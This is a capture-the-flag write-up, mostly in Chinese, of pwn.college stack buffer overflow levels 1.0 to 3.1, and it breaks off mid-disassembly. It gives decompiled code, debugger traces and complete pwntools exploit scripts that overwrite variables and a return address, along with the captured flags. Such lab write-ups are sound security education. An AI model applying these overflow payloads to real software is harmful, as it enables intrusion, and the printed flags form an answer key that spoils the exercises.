Write-ups: Program Security (Memory Errors) series (Completed)
Table of contents
Open Table of contents
- Level 1.0
- Level 1.1
- Level 2.0
- Level 2.1
- Level 3.0
- Level 3.1
- Level 4.0
- Level 4.1
- Level 5.0
- Level 5.1
- Level 6.0
- Level 6.1
- Level 7.0
- Level 7.1
- Level 8.0
- Level 8.1
- Level 9.0
- Level 9.1
- Level 10.0
- Level 10.1
- Level 11.0
- Level 11.1
- Level 12.0
- Level 12.1
- Level 13.0
- Level 13.1
- Level 14.0
- Level 14.1
- Level 15.0
- Level 15.1
- 后记
Level 1.0
- Category: Pwn
Overflow a buffer on the stack to set the right conditions to obtain the flag!
分析得程序主要逻辑从 challenge
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__int64 __fastcall challenge(int a1, __int64 a2, __int64 a3){ int *v3; // rax char *v4; // rax _QWORD v6[3]; // [rsp+0h] [rbp-50h] BYREF int v7; // [rsp+1Ch] [rbp-34h] int v8; // [rsp+24h] [rbp-2Ch] size_t nbytes; // [rsp+28h] [rbp-28h] _QWORD buf[2]; // [rsp+30h] [rbp-20h] BYREF _QWORD v11[2]; // [rsp+40h] [rbp-10h] BYREF __int64 savedregs; // [rsp+50h] [rbp+0h] BYREF _UNKNOWN *retaddr; // [rsp+58h] [rbp+8h] BYREF
38 collapsed lines
v7 = a1; v6[2] = a2; v6[1] = a3; v11[1] = __readfsqword(0x28u); buf[0] = 0LL; buf[1] = 0LL; v11[0] = 0LL; nbytes = 0LL; puts("The challenge() function has just been launched!"); sp_ = (__int64)v6; bp_ = (__int64)&savedregs; sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v6) >> 3) + 2; rp_ = (__int64)&retaddr; puts("Before we do anything, let's take a look at challenge()'s stack frame:"); DUMP_STACK(sp_, sz_); printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_); printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_); puts("including the saved base pointer and the saved return address, for a"); printf("total of %d bytes.\n", 8 * sz_); printf("The input buffer begins at %p, partway through the stack frame,\n", buf); puts("(\"above\" it in the stack are other local variables used by the function)."); puts("Your input will be read into this buffer."); printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 20); puts("large input length, and thus overflow the buffer.\n"); puts("In this level, there is a \"win\" variable."); puts("By default, the value of this variable is zero."); puts("However, when this variable is non-zero, the flag will be printed."); puts("You can make this variable be non-zero by overflowing the input buffer."); printf( "The \"win\" variable is stored at %p, %d bytes after the start of your input buffer.\n\n", (char *)v11 + 4, 20); puts("We have disabled the following standard memory corruption mitigations for this challenge:"); puts("- the binary is *not* position independent. This means that it will be"); puts("located at the same spot every time it is run, which means that by"); puts("analyzing the binary (using objdump or reading this output), you can"); puts("know the exact value that you need to overwrite the return address with.\n"); cp_ = bp_; cv_ = __readfsqword(0x28u); while ( *(_QWORD *)cp_ != cv_ ) cp_ -= 8LL; nbytes = 4096LL; printf("You have chosen to send %lu bytes of input!\n", 4096LL); printf("This will allow you to write from %p (the start of the input buffer)\n", buf); printf(1 collapsed line
"right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n", &buf[nbytes / 8], nbytes - 20); printf("Send your payload (up to %lu bytes)!\n", nbytes); v8 = read(0, buf, nbytes); if ( v8 < 0 ) { v3 = __errno_location();14 collapsed lines
v4 = strerror(*v3); printf("ERROR: Failed to read input -- %s!\n", v4); exit(1); } printf("You sent %d bytes!\n", v8); puts("Let's see what happened with the stack:\n"); DUMP_STACK(sp_, sz_); puts("The program's memory status:"); printf("- the input buffer starts at %p\n", buf); printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_); printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_); printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_); printf("- the canary is stored at %p.\n", (const void *)cp_); printf("- the canary value is now %p.\n", *(const void **)cp_); printf("- the address of the win variable is %p.\n", (char *)v11 + 4); printf("- the value of the win variable is 0x%x.\n", HIDWORD(v11[0])); putchar(10); if ( HIDWORD(v11[0]) ) win(); puts("Goodbye!"); return 0LL;}
注意到这里判断了 v11[0]
的高 32 bits。这时只要 v11[0]
的高 32 bits 不是 0
就都可以进入 if
内部,调用 win
if ( HIDWORD(v11[0]) ) { win(); }
所以我们要做的就是想办法覆盖 v11[0]
的高 32 bits。
_QWORD buf[2]; // [rsp+30h] [rbp-20h] BYREF_QWORD v11[2]; // [rsp+40h] [rbp-10h] BYREF
// ...
nbytes = 4096LL;// ...v8 = read(0, buf, nbytes);
这里 read
最多可以读取 4096 bytes 到 buf
。但是我们的 buf
只有 16 bytes,故存在缓冲区溢出问题,导致覆盖 v11
所以我们只要先输入 16 bytes 填满 buf
,再多写 5 bytes 就可以达到破坏 v11[0]
的高 32 bits 的目的。(注意 read
会把回车读进去,所以本地执行可以只输入 20 bytes)
from pwn import context, ELF, process, remote, gdb
context(log_level="debug", terminal="kitty")
FILE = "./binary-exploitation-first-overflow-w"HOST = "pwn.college"PORT = 1337
gdbscript = """c"""
def launch(local=True, debug=False): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug([elf.path], gdbscript=gdbscript) else: return process([elf.path]) else: return remote(HOST, PORT)
target = launch()
payload = b"A" * 21target.send(payload)
Flag: pwn.college{oQdReDoKIU218v6uPGguMuFOJnt.0VO4IDL5cTNxgzW}
Level 1.1
- Category: Pwn
This challenge is identical to its “easy” version from a security perspective, but has the following changes:
- Unlike the easy version, it does not give you helpful debug output. You will have to recover this information using a debugger.
- For all other “hard” versions, the source code will not be provided, and you will need to reverse-engineer the binary using your knowledge of the “easy” version as a reference. However, for this one challenge, to get you familiar with the differences between the easy and hard versions, we will provide the source code.
- Some randomization is different. Buffers might have different lengths, offsets might vary, etc. You will need to reverse engineer this information from the binary!
1 collapsed line
__int64 challenge(){ int *v0; // rax char *v1; // rax _QWORD buf[4]; // [rsp+30h] [rbp-30h] BYREF int v4; // [rsp+50h] [rbp-10h] unsigned __int64 v5; // [rsp+58h] [rbp-8h]
v5 = __readfsqword(0x28u); memset(buf, 0, sizeof(buf)); v4 = 0; printf("Send your payload (up to %lu bytes)!\n", 4096LL); if ( (int)read(0, buf, 0x1000uLL) < 0 ) { v0 = __errno_location(); v1 = strerror(*v0); printf("ERROR: Failed to read input -- %s!\n", v1); exit(1); } if ( v4 ) win(); puts("Goodbye!"); return 0LL;}
_QWORD buf[4]; // [rsp+30h] [rbp-30h] BYREFint v4; // [rsp+50h] [rbp-10h]
// ...
if ( (int)read(0, buf, 0x1000uLL) < 0 ) { /* ... */ }
// ...
if ( v4 ) { win(); }
由于程序根据 v4
的值来判断是否执行 win
,所以只要令 v4
不为 0 即可。
注意到 buf
只有 32 bytes,但是最大可以输入 4096 bytes,导致溢出覆盖 v4
from pwn import context, ELF, process, remote, gdb
context(log_level="debug", terminal="kitty")
FILE = "./binary-exploitation-first-overflow"HOST = "pwn.college"PORT = 1337
gdbscript = """c"""
def launch(local=True, debug=False): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug([elf.path], gdbscript=gdbscript) else: return process([elf.path]) else: return remote(HOST, PORT)
target = launch()
payload = b"A" * 33target.send(payload)
Flag: pwn.college{cwWgAcBgDsBnGFTCky9i1NRqAtO.0FM5IDL5cTNxgzW}
Level 2.0
- Category: Pwn
Overflow a buffer on the stack to set trickier conditions to obtain the flag!
4 collapsed lines
__int64 __fastcall challenge(int a1, __int64 a2, __int64 a3){ int *v3; // rax char *v4; // rax _QWORD v6[3]; // [rsp+0h] [rbp-D0h] BYREF int v7; // [rsp+1Ch] [rbp-B4h] int v8; // [rsp+24h] [rbp-ACh] size_t nbytes; // [rsp+28h] [rbp-A8h] BYREF void *buf; // [rsp+30h] [rbp-A0h] int *v11; // [rsp+38h] [rbp-98h] _BYTE v12[128]; // [rsp+40h] [rbp-90h] BYREF int v13; // [rsp+C0h] [rbp-10h] BYREF unsigned __int64 v14; // [rsp+C8h] [rbp-8h] __int64 savedregs; // [rsp+D0h] [rbp+0h] BYREF _UNKNOWN *retaddr; // [rsp+D8h] [rbp+8h] BYREF3 collapsed lines
v7 = a1; v6[2] = a2; v6[1] = a3; v14 = __readfsqword(0x28u); memset(v12, 0, sizeof(v12)); v13 = 0; buf = v12; v11 = &v13; nbytes = 0LL; puts("The challenge() function has just been launched!"); sp_ = (__int64)v6; bp_ = (__int64)&savedregs;23 collapsed lines
sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v6) >> 3) + 2; rp_ = (__int64)&retaddr; puts("Before we do anything, let's take a look at challenge()'s stack frame:"); DUMP_STACK(sp_, sz_); printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_); printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_); puts("including the saved base pointer and the saved return address, for a"); printf("total of %d bytes.\n", 8 * sz_); printf("The input buffer begins at %p, partway through the stack frame,\n", buf); puts("(\"above\" it in the stack are other local variables used by the function)."); puts("Your input will be read into this buffer."); printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 127); puts("large input length, and thus overflow the buffer.\n"); puts("In this level, there is a \"win\" variable."); puts("By default, the value of this variable is zero."); puts("However, if you can set variable to 0x0e530e48, the flag will be printed."); puts("You can change this variable by overflowing the input buffer, but keep endianness in mind!"); printf( "The \"win\" variable is stored at %p, %d bytes after the start of your input buffer.\n\n", v11, (_DWORD)v11 - (_DWORD)buf); cp_ = bp_; cv_ = __readfsqword(0x28u); while ( *(_QWORD *)cp_ != cv_ ) cp_ -= 8LL; printf("Payload size: "); __isoc99_scanf("%lu", &nbytes); printf("You have chosen to send %lu bytes of input!\n", nbytes); printf("This will allow you to write from %p (the start of the input buffer)\n", buf); printf(1 collapsed line
"right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n", (char *)buf + nbytes, nbytes - 127); printf("Send your payload (up to %lu bytes)!\n", nbytes); v8 = read(0, buf, nbytes); if ( v8 < 0 ) { v3 = __errno_location();14 collapsed lines
v4 = strerror(*v3); printf("ERROR: Failed to read input -- %s!\n", v4); exit(1); } printf("You sent %d bytes!\n", v8); puts("Let's see what happened with the stack:\n"); DUMP_STACK(sp_, sz_); puts("The program's memory status:"); printf("- the input buffer starts at %p\n", buf); printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_); printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_); printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_); printf("- the canary is stored at %p.\n", (const void *)cp_); printf("- the canary value is now %p.\n", *(const void **)cp_); printf("- the address of the win variable is %p.\n", v11); printf("- the value of the win variable is 0x%x.\n", *v11); putchar(10); if ( *v11 == 240324168 ) win(); puts("Goodbye!"); return 0LL;}
size_t nbytes; // [rsp+28h] [rbp-A8h] BYREFvoid *buf; // [rsp+30h] [rbp-A0h]int *v11; // [rsp+38h] [rbp-98h]_BYTE v12[128]; // [rsp+40h] [rbp-90h] BYREFint v13; // [rsp+C0h] [rbp-10h] BYREF
v13 = 0;buf = v12;v11 = &v13;nbytes = 0LL;
// ...
__isoc99_scanf("%lu", &nbytes);
// ...
v8 = read(0, buf, nbytes);
// ...
if ( *v11 == 240324168 ) { win(); }
如果 v11
指向的地址的内容为 240324168
则触发 win
注意到我们的 buf
为 128 bytes,由于最大输入长度可由我们自己自定义,因此可以溢出 buf
破坏 v13
,将 v13
修改为 240324168
from pwn import context, ELF, process, remote, gdb, p64
context(log_level="debug", terminal="kitty")
FILE = "./babymem-level-2-0"HOST = "pwn.college"PORT = 1337
gdbscript = """c"""
def launch(local=True, debug=False): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug([elf.path], gdbscript=gdbscript) else: return process([elf.path]) else: return remote(HOST, PORT)
target = launch()
payload = b"".ljust(128, b"A") + p64(240324168)payload_size = str(len(payload)).encode()
target.recvuntil(b"Payload size: ")target.sendline(payload_size)target.recvuntil(b"Send your payload")target.send(payload)
Flag: pwn.college{w7aHpdU-9AlFvJ5GtohCFtGwF7M.ddTNzMDL5cTNxgzW}
Level 2.1
- Category: Pwn
Overflow a buffer on the stack to set trickier conditions to obtain the flag!
1 collapsed line
__int64 challenge(){ int *v0; // rax char *v1; // rax size_t nbytes; // [rsp+28h] [rbp-38h] BYREF void *buf; // [rsp+30h] [rbp-30h] _DWORD *v5; // [rsp+38h] [rbp-28h] _QWORD v6[2]; // [rsp+40h] [rbp-20h] BYREF _QWORD v7[2]; // [rsp+50h] [rbp-10h] BYREF
v7[1] = __readfsqword(0x28u); v6[0] = 0LL; v6[1] = 0LL; v7[0] = 0LL; buf = v6; v5 = (_DWORD *)v7 + 1; nbytes = 0LL; printf("Payload size: "); __isoc99_scanf("%lu", &nbytes); printf("Send your payload (up to %lu bytes)!\n", nbytes); if ( (int)read(0, buf, nbytes) < 0 ) { v0 = __errno_location(); v1 = strerror(*v0); printf("ERROR: Failed to read input -- %s!\n", v1); exit(1); } if ( *v5 == 758965894 ) win(); puts("Goodbye!"); return 0LL;}
令 v5
指向的地址处的值为 758965894
即可触发 win
的大小为 16 bytes,溢出后可以覆盖 v7
为指向 v7
的 _DWORD + 1
处的地址,所以覆盖 buf
后需要加一个 _DWORD
pwndbg> rStarting program: /home/cub3y0nd/Projects/pwn.college/babymem-level-2-1[Thread debugging using libthread_db enabled]Using host libthread_db library "/usr/lib/libthread_db.so.1".###### Welcome to /home/cub3y0nd/Projects/pwn.college/babymem-level-2-1!###
Payload size: 1771Send your payload (up to 1771 bytes)!
Breakpoint 1, 0x000055555555619d in challenge ()20 collapsed lines
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────────────────────── RAX 0x7fffffffd180 ◂— 0 RBX 0x7fffffffe308 —▸ 0x7fffffffe6bb ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-2-1' RCX 0 RDX 0x6eb RDI 0 RSI 0x7fffffffd180 ◂— 0 R8 0x75 R9 0xfffffffc R10 0 R11 0x202 R12 1 R13 0 R14 0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f R15 0 RBP 0x7fffffffd1a0 —▸ 0x7fffffffe1e0 —▸ 0x7fffffffe280 —▸ 0x7fffffffe2e0 ◂— 0 RSP 0x7fffffffd140 —▸ 0x555555557175 ◂— 0x2023232300232323 /* '###' */ RIP 0x55555555619d (challenge+171) ◂— call 0x555555555180────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────── ► 0x55555555619d <challenge+171> call read@plt <read@plt> fd: 0 (/dev/pts/0) buf: 0x7fffffffd180 ◂— 0 nbytes: 0x6eb30 collapsed lines
0x5555555561a2 <challenge+176> mov dword ptr [rbp - 0x3c], eax 0x5555555561a5 <challenge+179> cmp dword ptr [rbp - 0x3c], 0 0x5555555561a9 <challenge+183> jns challenge+229 <challenge+229>
0x5555555561ab <challenge+185> call __errno_location@plt <__errno_location@plt>
0x5555555561b0 <challenge+190> mov eax, dword ptr [rax] 0x5555555561b2 <challenge+192> mov edi, eax 0x5555555561b4 <challenge+194> call strerror@plt <strerror@plt>
0x5555555561b9 <challenge+199> mov rsi, rax 0x5555555561bc <challenge+202> lea rdi, [rip + 0xf85] RDI => 0x555555557148 ◂— 'ERROR: Failed to read input -- %s!\n' 0x5555555561c3 <challenge+209> mov eax, 0 EAX => 0─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────00:0000│ rsp 0x7fffffffd140 —▸ 0x555555557175 ◂— 0x2023232300232323 /* '###' */01:0008│-058 0x7fffffffd148 —▸ 0x7fffffffe318 —▸ 0x7fffffffe6f1 ◂— 'SHELL=/usr/bin/zsh'02:0010│-050 0x7fffffffd150 —▸ 0x7fffffffe308 —▸ 0x7fffffffe6bb ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-2-1'03:0018│-048 0x7fffffffd158 ◂— 0x15555902004:0020│-040 0x7fffffffd160 —▸ 0x7fffffffd1a0 —▸ 0x7fffffffe1e0 —▸ 0x7fffffffe280 —▸ 0x7fffffffe2e0 ◂— ...05:0028│-038 0x7fffffffd168 ◂— 0x6eb06:0030│-030 0x7fffffffd170 —▸ 0x7fffffffd180 ◂— 007:0038│-028 0x7fffffffd178 —▸ 0x7fffffffd194 ◂— 0xf7a9ac0000000000───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────────── ► 0 0x55555555619d challenge+171 1 0x5555555562ea main+213 2 0x7ffff7dcae08 3 0x7ffff7dcaecc __libc_start_main+140 4 0x55555555520e _start+46────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────pwndbg> cContinuing.aaaaaaaabaaaaaaa
Breakpoint 3, 0x00005555555561d7 in challenge ()20 collapsed lines
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────*RAX 0x11 RBX 0x7fffffffe308 —▸ 0x7fffffffe6bb ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-2-1'*RCX 0x7ffff7eb0c21 (read+17) ◂— cmp rax, -0x1000 /* 'H=' */ RDX 0x6eb RDI 0 RSI 0x7fffffffd180 ◂— 'aaaaaaaabaaaaaaa\n' R8 0x75 R9 0xfffffffc R10 0*R11 0x246 R12 1 R13 0 R14 0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f R15 0 RBP 0x7fffffffd1a0 —▸ 0x7fffffffe1e0 —▸ 0x7fffffffe280 —▸ 0x7fffffffe2e0 ◂— 0 RSP 0x7fffffffd140 —▸ 0x555555557175 ◂— 0x2023232300232323 /* '###' */*RIP 0x5555555561d7 (challenge+229) ◂— mov rax, qword ptr [rbp - 0x28]────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────── ► 0x5555555561d7 <challenge+229> mov rax, qword ptr [rbp - 0x28] RAX, [0x7fffffffd178] => 0x7fffffffd194 ◂— 0xf7a9ac0000000000 0x5555555561db <challenge+233> mov eax, dword ptr [rax] EAX, [0x7fffffffd194] => 0 0x5555555561dd <challenge+235> cmp eax, 0x2d3ce686 0x0 - 0x2d3ce686 EFLAGS => 0x293 [ CF pf AF zf SF IF df of ] 0x5555555561e2 <challenge+240> ✔ jne challenge+252 <challenge+252> ↓ 0x5555555561ee <challenge+252> lea rdi, [rip + 0xf77] RDI => 0x55555555716c ◂— 'Goodbye!'12 collapsed lines
0x5555555561f5 <challenge+259> call puts@plt <puts@plt>
0x5555555561fa <challenge+264> mov eax, 0 EAX => 0 0x5555555561ff <challenge+269> mov rcx, qword ptr [rbp - 8] 0x555555556203 <challenge+273> xor rcx, qword ptr fs:[0x28] 0x55555555620c <challenge+282> je challenge+289 <challenge+289>
0x55555555620e <challenge+284> call __stack_chk_fail@plt <__stack_chk_fail@plt>─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────00:0000│ rsp 0x7fffffffd140 —▸ 0x555555557175 ◂— 0x2023232300232323 /* '###' */01:0008│-058 0x7fffffffd148 —▸ 0x7fffffffe318 —▸ 0x7fffffffe6f1 ◂— 'SHELL=/usr/bin/zsh'02:0010│-050 0x7fffffffd150 —▸ 0x7fffffffe308 —▸ 0x7fffffffe6bb ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-2-1'03:0018│-048 0x7fffffffd158 ◂— 0x15555902004:0020│-040 0x7fffffffd160 ◂— 0x11ffffd1a005:0028│-038 0x7fffffffd168 ◂— 0x6eb06:0030│-030 0x7fffffffd170 —▸ 0x7fffffffd180 ◂— 'aaaaaaaabaaaaaaa\n'07:0038│-028 0x7fffffffd178 —▸ 0x7fffffffd194 ◂— 0xf7a9ac0000000000───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────────── ► 0 0x5555555561d7 challenge+229 1 0x5555555562ea main+2134 collapsed lines
2 0x7ffff7dcae08 3 0x7ffff7dcaecc __libc_start_main+140 4 0x55555555520e _start+46────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────pwndbg> x/wx $rbp-0x280x7fffffffd178: 0xffffd194pwndbg> p/x 0x194-0x180$4 = 0x14
算出来 padding 大小是 0x14
from pwn import context, ELF, process, remote, gdb, p64
context(log_level="debug", terminal="kitty")
FILE = "./babymem-level-2-1"HOST = "pwn.college"PORT = 1337
gdbscript = """c"""
def launch(local=True, debug=False): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug([elf.path], gdbscript=gdbscript) else: return process([elf.path]) else: return remote(HOST, PORT)
target = launch()
payload = b"".ljust(0x14, b"A") + p64(758965894)payload_size = str(len(payload)).encode()
target.recvuntil(b"Payload size: ")target.sendline(payload_size)target.recvuntil(b"Send your payload")target.send(payload)
Flag: pwn.college{sZCPUpjO4U6HmvntMr91HLyNljf.dhTNzMDL5cTNxgzW}
Level 3.0
- Category: Pwn
Overflow a buffer and smash the stack to obtain the flag!
38 collapsed lines
###### Welcome to ./babymem-level-3-0!###
The challenge() function has just been launched!Before we do anything, let's take a look at challenge()'s stack frame:+---------------------------------+-------------------------+--------------------+| Stack location | Data (bytes) | Data (LE int) |+---------------------------------+-------------------------+--------------------+| 0x00007ffd41f77580 (rsp+0x0000) | b0 75 f7 41 fd 7f 00 00 | 0x00007ffd41f775b0 || 0x00007ffd41f77588 (rsp+0x0008) | 68 87 f7 41 fd 7f 00 00 | 0x00007ffd41f78768 || 0x00007ffd41f77590 (rsp+0x0010) | 58 87 f7 41 fd 7f 00 00 | 0x00007ffd41f78758 || 0x00007ffd41f77598 (rsp+0x0018) | 0b a7 02 f9 01 00 00 00 | 0x00000001f902a70b || 0x00007ffd41f775a0 (rsp+0x0020) | 1e 3e 40 00 00 00 00 00 | 0x0000000000403e1e || 0x00007ffd41f775a8 (rsp+0x0028) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 || 0x00007ffd41f775b0 (rsp+0x0030) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 || 0x00007ffd41f775b8 (rsp+0x0038) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 || 0x00007ffd41f775c0 (rsp+0x0040) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 || 0x00007ffd41f775c8 (rsp+0x0048) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 || 0x00007ffd41f775d0 (rsp+0x0050) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 || 0x00007ffd41f775d8 (rsp+0x0058) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 || 0x00007ffd41f775e0 (rsp+0x0060) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 || 0x00007ffd41f775e8 (rsp+0x0068) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 || 0x00007ffd41f775f0 (rsp+0x0070) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 || 0x00007ffd41f775f8 (rsp+0x0078) | b0 75 f7 41 fd 7f 00 00 | 0x00007ffd41f775b0 || 0x00007ffd41f77600 (rsp+0x0080) | 30 86 f7 41 fd 7f 00 00 | 0x00007ffd41f78630 || 0x00007ffd41f77608 (rsp+0x0088) | 51 2a 40 00 00 00 00 00 | 0x0000000000402a51 |+---------------------------------+-------------------------+--------------------+Our stack pointer points to 0x7ffd41f77580, and our base pointer points to 0x7ffd41f77600.This means that we have (decimal) 18 8-byte words in our stack frame,including the saved base pointer and the saved return address, for atotal of 144 bytes.The input buffer begins at 0x7ffd41f775b0, partway through the stack frame,("above" it in the stack are other local variables used by the function).Your input will be read into this buffer.The buffer is 68 bytes long, but the program will let you provide an arbitrarilylarge input length, and thus overflow the buffer.
In this level, there is no "win" variable.You will need to force the program to execute the win() functionby directly overflowing into the stored return address back to main,which is stored at 0x7ffd41f77608, 88 bytes after the start of your input buffer.That means that you will need to input at least 96 bytes (68 to fill the buffer,20 to fill other stuff stored between the buffer and the return address,and 8 that will overwrite the return address).10 collapsed lines
We have disabled the following standard memory corruption mitigations for this challenge:- the canary is disabled, otherwise you would corrupt it beforeoverwriting the return address, and the program would abort.- the binary is *not* position independent. This means that it will belocated at the same spot every time it is run, which means that byanalyzing the binary (using objdump or reading this output), you canknow the exact value that you need to overwrite the return address with.
Payload size:
程序直接告诉我们目的和需要多大的 padding 了,所以接下来直接找 win
直接上 pwndbg 查 win
pwndbg> i funAll defined functions:
Non-debugging symbols:0x0000000000401000 _init0x00000000004010f0 putchar@plt0x0000000000401100 __errno_location@plt0x0000000000401110 puts@plt0x0000000000401120 write@plt0x0000000000401130 printf@plt0x0000000000401140 geteuid@plt0x0000000000401150 read@plt0x0000000000401160 setvbuf@plt0x0000000000401170 open@plt0x0000000000401180 __isoc99_scanf@plt0x0000000000401190 exit@plt0x00000000004011a0 strerror@plt0x00000000004011b0 _start0x00000000004011e0 _dl_relocate_static_pie0x00000000004011f0 deregister_tm_clones0x0000000000401220 register_tm_clones0x0000000000401260 __do_global_dtors_aux0x0000000000401290 frame_dummy0x0000000000401296 DUMP_STACK0x0000000000401499 bin_padding0x0000000000402331 win0x0000000000402438 challenge0x000000000040298b main0x0000000000402a70 __libc_csu_init0x0000000000402ae0 __libc_csu_fini0x0000000000402ae8 _fini
from pwn import context, ELF, process, remote, gdb, p64
context(log_level="debug", terminal="kitty")
FILE = "./babymem-level-3-0"HOST = "pwn.college"PORT = 1337
gdbscript = """c"""
def launch(local=True, debug=False): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug([elf.path], gdbscript=gdbscript) else: return process([elf.path]) else: return remote(HOST, PORT)
target = launch()
payload = b"".ljust(88, b"A") + p64(0x402331)payload_size = str(len(payload)).encode()
target.recvuntil(b"Payload size: ")target.sendline(payload_size)target.recvuntil(b"Send your payload")target.send(payload)
Flag: pwn.college{0omKd6AgzV5NaakXpbDyYSre3hD.01M5IDL5cTNxgzW}
Level 3.1
- Category: Pwn
Overflow a buffer and smash the stack to obtain the flag!
16 collapsed lines
__int64 challenge(){ int *v0; // rax char *v1; // rax size_t nbytes; // [rsp+28h] [rbp-88h] BYREF _QWORD v4[13]; // [rsp+30h] [rbp-80h] BYREF int v5; // [rsp+98h] [rbp-18h] __int16 v6; // [rsp+9Ch] [rbp-14h] int v7; // [rsp+A4h] [rbp-Ch] void *buf; // [rsp+A8h] [rbp-8h]
memset(v4, 0, sizeof(v4)); v5 = 0; v6 = 0; buf = v4; nbytes = 0LL; printf("Payload size: "); __isoc99_scanf("%lu", &nbytes); printf("Send your payload (up to %lu bytes)!\n", nbytes); v7 = read(0, buf, nbytes); if ( v7 < 0 ) { v0 = __errno_location();7 collapsed lines
v1 = strerror(*v0); printf("ERROR: Failed to read input -- %s!\n", v1); exit(1); } puts("Goodbye!"); return 0LL;}
pwndbg> i fun20 collapsed lines
All defined functions:
Non-debugging symbols:0x0000000000401000 _init0x00000000004010f0 putchar@plt0x0000000000401100 __errno_location@plt0x0000000000401110 puts@plt0x0000000000401120 write@plt0x0000000000401130 printf@plt0x0000000000401140 geteuid@plt0x0000000000401150 read@plt0x0000000000401160 setvbuf@plt0x0000000000401170 open@plt0x0000000000401180 __isoc99_scanf@plt0x0000000000401190 exit@plt0x00000000004011a0 strerror@plt0x00000000004011b0 _start0x00000000004011e0 _dl_relocate_static_pie0x00000000004011f0 deregister_tm_clones0x0000000000401220 register_tm_clones0x0000000000401260 __do_global_dtors_aux0x0000000000401290 frame_dummy0x0000000000401296 bin_padding0x0000000000401a0b win0x0000000000401b12 challenge0x0000000000401c64 main0x0000000000401d40 __libc_csu_init2 collapsed lines
0x0000000000401db0 __libc_csu_fini0x0000000000401db8 _finipwndbg> disass challengeDump of assembler code for function challenge: 0x0000000000401b12 <+0>: endbr64 0x0000000000401b16 <+4>: push rbp 0x0000000000401b17 <+5>: mov rbp,rsp55 collapsed lines
0x0000000000401b1a <+8>: sub rsp,0xb0 0x0000000000401b21 <+15>: mov DWORD PTR [rbp-0x94],edi 0x0000000000401b27 <+21>: mov QWORD PTR [rbp-0xa0],rsi 0x0000000000401b2e <+28>: mov QWORD PTR [rbp-0xa8],rdx 0x0000000000401b35 <+35>: mov QWORD PTR [rbp-0x80],0x0 0x0000000000401b3d <+43>: mov QWORD PTR [rbp-0x78],0x0 0x0000000000401b45 <+51>: mov QWORD PTR [rbp-0x70],0x0 0x0000000000401b4d <+59>: mov QWORD PTR [rbp-0x68],0x0 0x0000000000401b55 <+67>: mov QWORD PTR [rbp-0x60],0x0 0x0000000000401b5d <+75>: mov QWORD PTR [rbp-0x58],0x0 0x0000000000401b65 <+83>: mov QWORD PTR [rbp-0x50],0x0 0x0000000000401b6d <+91>: mov QWORD PTR [rbp-0x48],0x0 0x0000000000401b75 <+99>: mov QWORD PTR [rbp-0x40],0x0 0x0000000000401b7d <+107>: mov QWORD PTR [rbp-0x38],0x0 0x0000000000401b85 <+115>: mov QWORD PTR [rbp-0x30],0x0 0x0000000000401b8d <+123>: mov QWORD PTR [rbp-0x28],0x0 0x0000000000401b95 <+131>: mov QWORD PTR [rbp-0x20],0x0 0x0000000000401b9d <+139>: mov DWORD PTR [rbp-0x18],0x0 0x0000000000401ba4 <+146>: mov WORD PTR [rbp-0x14],0x0 0x0000000000401baa <+152>: lea rax,[rbp-0x80] 0x0000000000401bae <+156>: mov QWORD PTR [rbp-0x8],rax 0x0000000000401bb2 <+160>: mov QWORD PTR [rbp-0x88],0x0 0x0000000000401bbd <+171>: lea rdi,[rip+0x548] # 0x40210c 0x0000000000401bc4 <+178>: mov eax,0x0 